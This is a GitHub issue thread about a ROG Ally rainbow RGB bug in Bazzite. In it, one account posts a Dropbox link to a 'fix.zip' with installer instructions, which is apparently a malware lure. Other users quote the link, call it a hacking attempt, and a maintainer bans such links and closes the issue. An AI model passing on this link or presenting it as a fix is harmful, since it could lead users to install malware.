### ISSUE TITLE
Ally RBG, Rainbow.

### ISSUE THREAD

**Issue by helloman37** [ublue-os/bazzite#1542] opened 2024-08-26 00:09 UTC
### Describe the bug

I looked around it says to rebase. When i do that, rebase fails Everytime. So why not go back to the version that people are saying fixes the issue, and release a new iso. 

Honestly this issue had been going on far too long not tonget response and it seems y'all are ignoring it. Regardless of the warning on your website, how about doing this and make it where people can fix it in the next upgrade. Kinda makes me feel you are taking my Rog Ally for hostage. 

I had done everything even updated what was suggested still rebase fails. So...... How about to make it easier make an iso with the said version to fix it.
### What did you expect to happen?

rebase to fix rainbow RGB.

**Comment by IvanJrX** [comment] 2024-08-26 00:16
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by helloman37** [comment] 2024-08-26 00:38
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Hmm to surprise doesn't work.

**Comment by helloman37** [comment] 2024-08-26 01:51
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Lol trying to hack devices eh lol

**Comment by KyleGospo** [comment] 2024-08-26 02:00
Do not post illicit links again. Anyone doing so will earn a permanent ban from this org.

**Comment by KyleGospo** [comment] 2024-08-26 02:00
Closing, duplicate of https://github.com/ublue-os/bazzite/issues/1153

**Closed by KyleGospo** 2024-08-26 02:00 UTC
Labels: iso, asus-ally

**Comment by castrojo** [comment] 2024-08-26 03:40
Responses here are to a now-deleted post, thanks for the report @helloman37! Let's continue the discussion in the open issue.
